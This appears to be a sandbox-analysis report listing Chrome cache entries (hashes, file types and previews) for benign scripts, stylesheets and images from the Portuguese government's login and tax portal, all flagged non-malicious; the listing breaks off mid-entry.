                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, ASCII text, with very long lines (5238), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):5418
                                                                                                                Entropy (8bit):5.295213776015613
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:t4A8XX1wZG2DcHcmlG8Q48tZGruP0XTepmNWb14ANxYPeqdqPqyPC0m2lY:tUwZG2g8myTtZ6lKQob1dHYPeIny6xX
                                                                                                                MD5:D704F7C9C62C47B265F2C5700A45743E
                                                                                                                SHA1:F652122ED0AAA37EDC4707975B45AE3641EC6D10
                                                                                                                SHA-256:20C35EBC2DAEB43DA1383ED5C762C2EDDFCF762B389883924397F75BB6442D7B
                                                                                                                SHA-512:E469B5C61A8CB94A31DF124F3159855434A4E0AEE386E20A5E82BBE1D23A353B58F29EB317BFB15DB8ED879BAECE851AC92F2DA1857D019D7C104BA0D813E6D2
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/modernizr.js?cb=5.2.10
                                                                                                                Preview:/* Modernizr 2.8.3 (Custom Build) | MIT & BSD.. * Build: http://modernizr.com/download/#-shiv-addtest-prefixed-teststyles-testprop-testallprops-hasevent-prefixes-domprefixes.. */..;window.Modernizr=function(a,b,c){function z(a){i.cssText=a}function A(a,b){return z(l.join(a+";")+(b||""))}function B(a,b){return typeof a===b}function C(a,b){return!!~(""+a).indexOf(b)}function D(a,b){for(var d in a){var e=a[d];if(!C(e,"-")&&i[e]!==c)return b=="pfx"?e:!0}return!1}function E(a,b,d){for(var e in a){var f=b[a[e]];if(f!==c)return d===!1?a[e]:B(f,"function")?f.bind(d||b):f}return!1}function F(a,b,c){var d=a.charAt(0).toUpperCase()+a.slice(1),e=(a+" "+n.join(d+" ")+d).split(" ");return B(b,"string")||B(b,"undefined")?D(e,b):(e=(a+" "+o.join(d+" ")+d).split(" "),E(e,b,c))}var d="2.8.3",e={},f=b.documentElement,g="modernizr",h=b.createElement(g),i=h.style,j,k={}.toString,l=" -webkit- -moz- -o- -ms- ".split(" "),m="Webkit Moz O ms",n=m.split(" "),o=m.toLowerCase().split(" "),p={},q={},r={},s=[],t=s.

                                                                                                                Chrome Cache Entry: 85

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1609
                                                                                                                Entropy (8bit):4.686265065538421
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:mLHhP7OIkn2UFiOiV6eigpigNzbak/ef4igtjf4i0/WWig7RWiK:MB02CiOiTi8ioa6iriGijiK
                                                                                                                MD5:430DE688693604EBDF8B06F389A8E12E
                                                                                                                SHA1:98450828D02A8486B92FE86E56CD0B2D1E1B4D42
                                                                                                                SHA-256:E17E63ADB656344E4B23F5A7C6C0F70580551920BDE557D38C9C73A1E9ECF5A3
                                                                                                                SHA-512:FCF3DA5DEC2D2AC53278667EFEB95C784215C15610DF1A6A7E22A2A651F704DA857A764ED46AF712937B9367153882418E3526BA26453D645A916FC3500D3FC1
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/capslock-login.js?cb=5.2.10
                                                                                                                Preview:var capslockActive = false;..var inputNif = document.getElementById("password-nif");..var inputEori = document.getElementById("password-eori");....function capsLockEventDetect(event) {.. var capsNif = document.getElementById("caps-nif");.. var capsEori = document.getElementById("caps-eori");.. var curr = document.activeElement;.... if (event.getModifierState !== undefined && event.getModifierState("CapsLock")) {.. capslockActive = true;.. if (inputNif === curr) {.. capsNif.style.display = "block";.. }.. else if (capsEori && inputEori === curr) {.. capsEori.style.display = "block";.. }.. } else {.. capslockActive = false;.. capsNif.style.display = "none";.. if (capsEori) {.. capsEori.style.display = "none";.. }.. }..}....document.addEventListener("keydown", function(event) {.. capsLockEventDetect(event);..});....if (inputNif) {.. inputNif.addEventListener("blur", funct

                                                                                                                Chrome Cache Entry: 86

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, ASCII text, with very long lines (1475)
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1525
                                                                                                                Entropy (8bit):4.898762569340083
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:DcsWRcieA/Fhxwkw4lPJju6m4ITcbz3LRQfFevzADIctm16A6mNmMg+GX7RRHfA:DydTat4lPJy0ITcP9AevUt9A6S9gd8
                                                                                                                MD5:74EF677768ABAA390ECD61C5E55F7D32
                                                                                                                SHA1:1362473BA9A3B0E993737D67862586FF7F611B6A
                                                                                                                SHA-256:FCC6F846F1230079B8049C30BAC80ABD2E9B2D68E8F90E985A33008F2574C294
                                                                                                                SHA-512:53F9ABE1BD59163142F5598A68AD0E1A821BF274DF122760731A16D7CBDA8DBC2C467D68D1981AFBFCA50A12A94CEBD636072DDF0C19AFEC5B8858B481B54D56
                                                                                                                Malicious:false
                                                                                                                URL:https://static.portaldasfinancas.gov.pt/app/pfstatic_static/js/pf-footer.js
                                                                                                                Preview:window.PF||(PF={}),window.PF.common||(PF.common={footer:'<b>Dados Pessoais</b><br />A Autoridade Tribut&aacute;ria e Aduaneira (AT) trata dados pessoais no &acirc;mbito das suas atribui&ccedil;&otilde;es, designadamente as constantes do artigo 2.&ordm;, n.&ordm; 2, do Decreto-Lei n.&ordm; 118/2011, de 5 de dezembro. Para cumprimento do Regulamento Geral sobre a Prote&ccedil;&atilde;o de Dados (RGPD) e da Lei n.&ordm; 58/2019, de 8 de agosto, o Despacho n.&ordm; 13949-A/2022 designou a mestre In&ecirc;s Oliveira Andrade de Jesus como <a href="@info-url@/pt/at/Pages/Encarregado_protecao_dados.aspx" title="encarregada da prote&ccedil;&atilde;o de dados">encarregada da prote&ccedil;&atilde;o de dados</a> da AT. Os titulares dos dados podem contactar a encarregada da prote&ccedil;&atilde;o de dados da AT sobre todas as quest&otilde;es relacionadas com o tratamento dos seus dados pessoais e com o exerc&iacute;cio dos direitos que lhe s&atilde;o conferidos pelo RGPD atrav&eacute;s do endere&c

                                                                                                                Chrome Cache Entry: 87

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):3511
                                                                                                                Entropy (8bit):4.819787220741833
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:RTnt1BsFq1BW1B6g1BuN4OdmC05fhi3JRhuKM+otpuUrrNrcZYX0lXW2NzqhVUVH:RncrCC6enD39cuCm2Nz4VUVjY+tvhBZ
                                                                                                                MD5:02FDD6A58827703E1B46D99DA0FB7FB0
                                                                                                                SHA1:FB8D3DCC85BA25E978A43D9F871BB94755B6ECD0
                                                                                                                SHA-256:8B751842C2EC5F3602CC30739CE41D3B7E611E5443DA7E483D72AB48AC683D1E
                                                                                                                SHA-512:DA0189817E4BF9D2B40DECFFD0B8BB25FC017B5115625E66736CA0E86712DF6819F2AC95518BA2378ADF9F47298E8E2A35806D9072E1A815AE8894B82DF226C7
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/pf/css/footer.css?cb=5.2.10
                                                                                                                Preview:@media print {.. .main-footer {.. display: none;.. }..}.....main-footer {.. background: #dbdee0;.. background: -moz-linear-gradient(top, #dbdee0 0%, #cdd1d3 100%);.. background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #dbdee0), color-stop(100%, #cdd1d3));.. background: -webkit-linear-gradient(top, #dbdee0 0%, #cdd1d3 100%);.. background: -o-linear-gradient(top, #dbdee0 0%, #cdd1d3 100%);.. background: -ms-linear-gradient(top, #dbdee0 0%, #cdd1d3 100%);.. background: linear-gradient(to bottom, #dbdee0 0%, #cdd1d3 100%);.. filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#dbdee0', endColorstr='#cdd1d3', GradientType=0);.. padding: 35px 0;.. color: #524f4f;.. font-size: 14px;.. min-height: 196px;.. overflow: hidden;.. position: relative;..}.....main-footer:before {.. content: "";.. display: block;.. width: 200px;.. height: 298px;.. background-image: url(../images/decoration/footer

                                                                                                                Chrome Cache Entry: 88

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 429 x 727, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):43457
                                                                                                                Entropy (8bit):7.9638651297217935
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:tSWaGYgbYWSuQyZk/wmBfRih+EcQ0DccVdbNWPi8J5W2jLBEKpPL6zt334:t1bYg3gyZ8TOD5cLN58J42jLOKpza4
                                                                                                                MD5:841D0BC9367FBB99D878411AAFF20275
                                                                                                                SHA1:99D2C1BB03118760FDBEED83044AB49015252DD3
                                                                                                                SHA-256:D09142E539ED99866028C1E364414A3AE60B2CB6D0DA260D5C45EAF7959D9EB5
                                                                                                                SHA-512:EA917F73A202E02B67AE4F31E83728DEE29F03D63F4753B8F1741EA9E7562A09EAFA2A47F3D5152B78B884820C43854B693CB8E408086170BA8B014F4CC4163C
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/img/background.png
                                                                                                                Preview:.PNG........IHDR.............>.......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:a4af9685-df3c-4b64-81aa-4e7cae4e7227" xmpMM:DocumentID="xmp.did:8E4FF9D58DF311E4B2B8C0A529914AA5" xmpMM:InstanceID="xmp.iid:8E4FF9D48DF311E4B2B8C0A529914AA5" xmp:CreatorTool="Adobe Photoshop CC 2014 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:d2409a93-3826-4bac-a0fc-945b22676568" stRef:documentID="adobe:docid:photoshop:95e515eb-ba9e-1177-b6de-bfe0123df8d4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C....IDATx....]U

                                                                                                                Chrome Cache Entry: 89

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):6518
                                                                                                                Entropy (8bit):2.6111970432860367
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:GjtIzfm79zXQbHCWfyADAolvx8qZybjc1:3Qzgb7y4TJtyP
                                                                                                                MD5:8102D44D0C555D9EA5F0F6E03131734B
                                                                                                                SHA1:108E7CFBE30E36C0FE73DE0591D541371225DC51
                                                                                                                SHA-256:B2CBEBB8F1479868C4FC79E20C8937D94859D45C3445E3C6ECC0841BEC20C67B
                                                                                                                SHA-512:9CDDCF5411D298395551A52168AAD14B3365F3E46CBD3EAA068D07D24E482CA0D73D561D6EDB59EA93C5220533DCF6C329ED92568AFC36BA9C47E651CD585610
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/icons/favicon.ico
                                                                                                                Preview:............ .(...&... .... .(...N...(....... ..... ..............................................................................................................yi.........................................................S....ra.sU@.wZF.........P*..N(..................................D...D...D...F............ve.D..................................D....o].lL6.V1...q`.........sU@................................D..........D...D.........r.S...................................D.....{.sU@.K$..D....q_..o].D................................~.E........q.......y.`>&...........v..........................xg.J#..................eD-....................................m[.D....ve.nO9.S/..K$...xg..yi.D...............................rT?.K%..........D...D.....v...................................[8 .D.....w.uXC.D...D...W3.....................................iI3.O)..Z7..H ..D...[8 ......m[......................................ud......ud...~.................................................ud......w

                                                                                                                Chrome Cache Entry: 90

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (8308), with no line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):8308
                                                                                                                Entropy (8bit):5.036239021416478
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:gpaAfkEVd6L9yLvbno+KyuoFfK9nVcGStW9qe5cR4NYRW:gpaAfki6Lcvo+KyPc9nOGStW8e5Y4N0W
                                                                                                                MD5:2842654782A75CBBC8CD66C60B72631D
                                                                                                                SHA1:EF3A49FE1BCF31CCA95CDEE5563928A850A1B154
                                                                                                                SHA-256:8A41D60F7762F2DB0792FD909C3C09725F93D8FE1E94EFCB2CA04293921E277A
                                                                                                                SHA-512:A34FCB9003AE5024320BC84884B026AFE8CDA0629FF0F0FC226F63ED44FC45C8F3AB4052714B35B49027D2DABC29721F960DA8FBA055BBF814EAAAE647B1726D
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.10
                                                                                                                Preview:(function(e,t){"use strict";function n(e){var t=Array.prototype.slice.call(arguments,1);return e.prop?e.prop.apply(e,t):e.attr.apply(e,t)}function s(e,t,n){var s,a;for(s in n)n.hasOwnProperty(s)&&(a=s.replace(/ |$/g,t.eventNamespace),e.bind(a,n[s]))}function a(e,t,n){s(e,n,{focus:function(){t.addClass(n.focusClass)},blur:function(){t.removeClass(n.focusClass),t.removeClass(n.activeClass)},mouseenter:function(){t.addClass(n.hoverClass)},mouseleave:function(){t.removeClass(n.hoverClass),t.removeClass(n.activeClass)},"mousedown touchbegin":function(){e.is(":disabled")||t.addClass(n.activeClass)},"mouseup touchend":function(){t.removeClass(n.activeClass)}})}function i(e,t){e.removeClass(t.hoverClass+" "+t.focusClass+" "+t.activeClass)}function r(e,t,n){n?e.addClass(t):e.removeClass(t)}function l(e,t,n){var s="checked",a=t.is(":"+s);t.prop?t.prop(s,a):a?t.attr(s,s):t.removeAttr(s),r(e,n.checkedClass,a)}function u(e,t,n){r(e,n.disabledClass,t.is(":disabled"))}function o(e,t,n){switch(n){case

                                                                                                                Chrome Cache Entry: 91

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1347
                                                                                                                Entropy (8bit):5.0340215087881965
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:VWza9Wzau0WXWjWhkedY9CWROJ+X9TNvyoihBsfZnbA8V6dwXbyBpA+nWb1:IzXzdvGChk19CWRX9P8BsfZn8mOU
                                                                                                                MD5:71144EED16DA6FCFF4DEB76B966F0814
                                                                                                                SHA1:7F8F5854C847525DCF64F79E63E8276E38ABD7AE
                                                                                                                SHA-256:2EEF55E879E9FFEB7A7A6F87D1805DCD4EF5E1D2659DD08E1FCE620121AA8BAC
                                                                                                                SHA-512:83F9830F99B87CC48739B82997533F35F7E5D6E9BB7AB647B53180B36EE5C60E600059B97B493624B323E140FD3EFBA56821D7B4158D58999F7E41FC2F100BD4
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/css/sa-custom.css?cb=5.2.10
                                                                                                                Preview:@font-face {.. font-family: 'sa_custom_caps';.. src: url('../fonts/sa_custom_caps.eot?s31xf0');.. src: url('../fonts/sa_custom_caps.eot?s31xf0#iefix') format('embedded-opentype'),.. url('../fonts/sa_custom_caps.ttf?s31xf0') format('truetype'),.. url('../fonts/sa_custom_caps.woff?s31xf0') format('woff'),.. url('../fonts/sa_custom_caps.svg?s31xf0#at_caps') format('svg');.. font-weight: normal;.. font-style: normal;..}....[class^="icon-sa-custom-"], [class*=" icon-sa-custom-"] {.. /* use !important to prevent issues with browser extensions that change fonts */.. font-family: 'sa_custom_caps' !important;.. speak: none;.. font-style: normal;.. font-weight: normal;.. font-variant: normal;.. text-transform: none;.. line-height: 1;.... /* Better Font Rendering =========== */.. -webkit-font-smoothing: antialiased;.. -moz-osx-font-smoothing: grayscale;..}.....icon-sa-custom-caps-lock:before {.. content: "\e900";..}.....half-width {.. width: 50% !important;..}.....foo

                                                                                                                Chrome Cache Entry: 92

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1303), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):3496
                                                                                                                Entropy (8bit):4.9627602211027035
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:4WNFT6rFZdTat4lPJ90ITcP9AevUt9A6S9IAArqGnjdlzS9hakP1GzJ1tJwlgODJ:56rc4x9lDmYqAzm8Il5D5eFk
                                                                                                                MD5:1502FECE40BD14167173803D98F8281B
                                                                                                                SHA1:2B3F37EF634960A4E95C06A6A5F9F12932D0F586
                                                                                                                SHA-256:FE1B489D668E0538B6A0CAA3D2FDC372E7C32D70C036188E3910A016B75DE21F
                                                                                                                SHA-512:23C8FE828F2C78F1FDEEA7AC6EFFDA00F749757573001FA1235D953BD31E9D545451C28C4D5BD9FE05DD4D2E4F0C2695BD57EADB55C99AE7A100B8A3B6900621
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/footer/footer.js?cb=5.2.10
                                                                                                                Preview:window.onload = function() {.... /**.. * Preencher footer com a info do RGPD.. */.... var footerElem = document.getElementById("footer-rgpd-content");.... if (window.PF && window.PF.common && window.PF.common.footer) {.... footerElem.innerHTML = PF.common.footer;.... } else {.... footerElem.innerHTML = '<b>Dados Pessoais</b><br />A Autoridade Tribut&aacute;ria e Aduaneira (AT) trata dados pessoais no &acirc;mbito das suas atribui&ccedil;&otilde;es, designadamente as constantes do artigo 2.&ordm;, n.&ordm; 2, do Decreto-Lei n.&ordm; 118/2011, de 5 de dezembro. Para cumprimento do Regulamento Geral sobre a Prote&ccedil;&atilde;o de Dados (RGPD) e da Lei n.&ordm; 58/2019, de 8 de agosto, o Despacho n.. 13949-A/2022 designou a mestre In&ecirc;s Oliveira Andrade de Jesus como <a href="@info-url@/pt/at/Pages/Encarregado_protecao_dados.aspx" title="encarregada da prote&ccedil;&atilde;o de dados">encarregada da prote&ccedil;&atilde;o de dados</a> da AT. Os ti

                                                                                                                Chrome Cache Entry: 93

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (21445), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):21587
                                                                                                                Entropy (8bit):5.291214897531632
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:QhpW5B+Jx6Utb7YlHqdS2L7Az548TsljN/tllEny+WC5MQPN3tCwV/vyxMLgoqn9:F+Jx6U2lHqdS2gz54pr/1Eny+WChaxMs
                                                                                                                MD5:A3601786B7EE8FA301939C8FD4F9CBA6
                                                                                                                SHA1:969FD5D7BEF5559B6FFD8EA477D4E7BA732F55AF
                                                                                                                SHA-256:AF39C945F12C4E06595178BE35788C26086EF65FF070326126AD00CBA7E5B1B0
                                                                                                                SHA-512:E6EDB291A36F54494F9AEA2E4EE9A0A39A19C4F8243A88F2FD02CBBD6316DFE001D9509A9355A154501F4E8A447EABD814838B2D0119A61841E31DDED8A01B03
                                                                                                                Malicious:false
                                                                                                                Preview:/*! jQuery Validation Plugin - v1.13.1 - 10/14/2014.. * http://jqueryvalidation.org/.. * Copyright (c) 2014 J.rn Zaefferer; Licensed MIT */..!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a(jQuery)}(function(a){a.extend(a.fn,{validate:function(b){if(!this.length)return void(b&&b.debug&&window.console&&console.warn("Nothing selected, can't validate, returning nothing."));var c=a.data(this[0],"validator");return c?c:(this.attr("novalidate","novalidate"),c=new a.validator(b,this[0]),a.data(this[0],"validator",c),c.settings.onsubmit&&(this.validateDelegate(":submit","click",function(b){c.settings.submitHandler&&(c.submitButton=b.target),a(b.target).hasClass("cancel")&&(c.cancelSubmit=!0),void 0!==a(b.target).attr("formnovalidate")&&(c.cancelSubmit=!0)}),this.submit(function(b){function d(){var d,e;return c.settings.submitHandler?(c.submitButton&&(d=a("<input type='hidden'/>").attr("name",c.submitButton.name).val(a(c.submitButton).val()).appendTo(c.currentForm)),e=

                                                                                                                Chrome Cache Entry: 94

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 618 x 166, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):10264
                                                                                                                Entropy (8bit):7.893606373253685
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:r9/l7HNm2qUdKrEC+VmNIgargB0UFj6jbUpm5e93/YmkpcAX:r9lHXC3ug9FCP5e9vLnAX
                                                                                                                MD5:91E9E0C62F158101C511C746B98AB45D
                                                                                                                SHA1:3D9E122EA989782126594142F5AD03E257A1D96C
                                                                                                                SHA-256:A2BC8BF86EF8D948D5CB87EC1E4B185BF87CF4A731F2F93EA5CC29AE64302AF6
                                                                                                                SHA-512:4C8EDE889D61BE5474BF341283FE2E7756E37E9B5B466F47B1709316EF72088584104F914274E035B1BF36812A80865EDE06DAC044704EFA0C8C72436D3812CE
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/img/autenticacaogov.png
                                                                                                                Preview:.PNG........IHDR...j.........jg......sRGB.........gAMA......a.....pHYs..........o.d..'.IDATx^.{.....w.V.j=m.m......sNo.... .QPPT.U.."^B..!@H !\C...........w3.W&.Y3{f..=..y.G...5..g.....o..B.!....5B.!...B.F.!...Sh..!..Br...!..BHN.m.f.....m54>MQ.iljF}....UF.!...HF......9..W..%.....3.J\.......:.._..!....d..f....C.....k....7.+..B.)..F.opB}{]...........D.!...@...sR}..........I.!....Q...\=..1.IQ.R.A..%..B...Q.}.....j.uMj....!....!........]..J.!..7.Q.>.> )*....v.J%..B....i.......=...R.!...F4j..=/> )*/....VB.!.~...K..........3!..R..Q5).5B.!E.F..I..B.).4jTM.F..BH..Q.jR4j..B....U..Q#..R.h.(u....8...>..4...]...+#....zsR..L..s.....!.."@.V@...cj[K.:.?Z6<X2,...cb_....!.."@.V.!b...r.l&..4j..BH.........W....0h..!...Q.3}....<..Y..L..5B.!${h..D....w.....g.4j..BH....T.#.j6f.+4j..BH......RS..o-]h..!...Q.A=.z.:{u.....F..B..........KlT...!...=4j5".v.9..M..5B.!${h.j@.....Ny.Nu.Q#..B..F-.z|S....f.@.4j..BH...X.{.T"..$...!...=4j9.LZ...$h..!...Q..f...

                                                                                                                Chrome Cache Entry: 95

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):2107
                                                                                                                Entropy (8bit):4.954992161322799
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:v9IgFVDZyWbpUuzmO3Zi7f5hHU8nDHEH1FTLFvjrNV7ETfFz3yCPrVUb2:5DZ5V7B307fNDalqRLpL
                                                                                                                MD5:8A8991F71F5B1ACAA1FB1C5CCA4729E4
                                                                                                                SHA1:53D0D36F0DE6C2D0CF1222F9F4BAA49115B240AC
                                                                                                                SHA-256:74470D0811A33D6360A606CC6B43F4C729571AE63A381188CB55E41409F38318
                                                                                                                SHA-512:3C128F2C69FB0BEBC4693BE42A0F6B33D7B1C96DFF47399A17FE5E2E02ED7BF5B65D9D8D13CF4F53BE1740858847E4C3E1576A388179688074AC694CC53B0FDE
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/css/tabs.css?cb=5.2.10
                                                                                                                Preview:.side-panel,.tabs{max-width:90%;float:none;list-style:none;padding:0;margin:75px auto;}..side-panel:after,.tabs:after{content:'';display:table;clear:both;}..tabs input[type=radio]{display:none;}..tab-label span{font-weight:700;text-decoration:none;color:#0084cc;font-size:14px;}..tab-label{-webkit-transition:all .1s linear;-moz-transition:all .1s linear;transition:all .1s linear;margin:-2px;padding:15px;width:33%;text-align:center;display:inline-block;cursor:pointer;border-bottom:2px solid #f0f2f3;}..tab-label i{padding:5px;margin-right:0;}..tab-content{display:none;width:75%;margin-left:10%;padding:15px;box-sizing:border-box;margin-top:20px;background-color:#ffffff;}..tabs [id^="tab"]:checked+label{border-bottom:2px solid #0084cc;font-size:16px;padding-bottom:14px;}..tabs [id^="tab"]:checked+label>span{color:#303030;}..tab-label:hover{background-color:#eee;}.#tab1:checked~#tab-content1,#tab2:checked~#tab-content2,#tab3:checked~#tab-content3{display:inline-block;}.@media (max-width:500p

                                                                                                                Chrome Cache Entry: 96

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (21445), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):21587
                                                                                                                Entropy (8bit):5.291214897531632
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:QhpW5B+Jx6Utb7YlHqdS2L7Az548TsljN/tllEny+WC5MQPN3tCwV/vyxMLgoqn9:F+Jx6U2lHqdS2gz54pr/1Eny+WChaxMs
                                                                                                                MD5:A3601786B7EE8FA301939C8FD4F9CBA6
                                                                                                                SHA1:969FD5D7BEF5559B6FFD8EA477D4E7BA732F55AF
                                                                                                                SHA-256:AF39C945F12C4E06595178BE35788C26086EF65FF070326126AD00CBA7E5B1B0
                                                                                                                SHA-512:E6EDB291A36F54494F9AEA2E4EE9A0A39A19C4F8243A88F2FD02CBBD6316DFE001D9509A9355A154501F4E8A447EABD814838B2D0119A61841E31DDED8A01B03
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.10
                                                                                                                Preview:/*! jQuery Validation Plugin - v1.13.1 - 10/14/2014.. * http://jqueryvalidation.org/.. * Copyright (c) 2014 J.rn Zaefferer; Licensed MIT */..!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a(jQuery)}(function(a){a.extend(a.fn,{validate:function(b){if(!this.length)return void(b&&b.debug&&window.console&&console.warn("Nothing selected, can't validate, returning nothing."));var c=a.data(this[0],"validator");return c?c:(this.attr("novalidate","novalidate"),c=new a.validator(b,this[0]),a.data(this[0],"validator",c),c.settings.onsubmit&&(this.validateDelegate(":submit","click",function(b){c.settings.submitHandler&&(c.submitButton=b.target),a(b.target).hasClass("cancel")&&(c.cancelSubmit=!0),void 0!==a(b.target).attr("formnovalidate")&&(c.cancelSubmit=!0)}),this.submit(function(b){function d(){var d,e;return c.settings.submitHandler?(c.submitButton&&(d=a("<input type='hidden'/>").attr("name",c.submitButton.name).val(a(c.submitButton).val()).appendTo(c.currentForm)),e=

                                                                                                                Chrome Cache Entry: 97

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):132
                                                                                                                Entropy (8bit):5.11667638873558
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:PuhvLUiSNDrNqTbTQiymCTUSbpLRAWzPf8ImhHrK5TvntHR:PuhvoLBMTbTQAFC3AWrIBgHR
                                                                                                                MD5:89E93357A5B85971EF2E8C719E858D2C
                                                                                                                SHA1:0BCFE2B65CE1A26EC0AEE789D67672EE399A32A6
                                                                                                                SHA-256:A4AA52334DE292554BF5EE1DF39397F8E9910080B8332E8752B139AF72C13485
                                                                                                                SHA-512:FDB568D659C036AEEDC68D8EBE327F8CE18C9ABBAA0BC8D46B0C314FADA6DD3F5F58FCECFB04197896B40DFC5AB1FEE1A5B6F35F30DE6B6AD7B9BA73FD08BB33
                                                                                                                Malicious:false
                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlQwFDawOwNyhIFDeeNQA4SBQ3OQUx6EhcJgK_h7X-xEz0SBQ2Zn7JxEgUNzkFMeg==?alt=proto
                                                                                                                Preview:CjgKDQ3njUAOGgQIVhgCIAEKJw3OQUx6GgQISxgCKhoIClIWCgxALiojIV8tKyQ/LyYQARj/////DwomCgsNmZ+ycRoECFYYAgoXDc5BTHoaBAhLGAIqCggKKA1SBBAAGAA=

                                                                                                                Chrome Cache Entry: 98

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (8308), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8308
                                                                                                                Entropy (8bit):5.036239021416478
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:gpaAfkEVd6L9yLvbno+KyuoFfK9nVcGStW9qe5cR4NYRW:gpaAfki6Lcvo+KyPc9nOGStW8e5Y4N0W
                                                                                                                MD5:2842654782A75CBBC8CD66C60B72631D
                                                                                                                SHA1:EF3A49FE1BCF31CCA95CDEE5563928A850A1B154
                                                                                                                SHA-256:8A41D60F7762F2DB0792FD909C3C09725F93D8FE1E94EFCB2CA04293921E277A
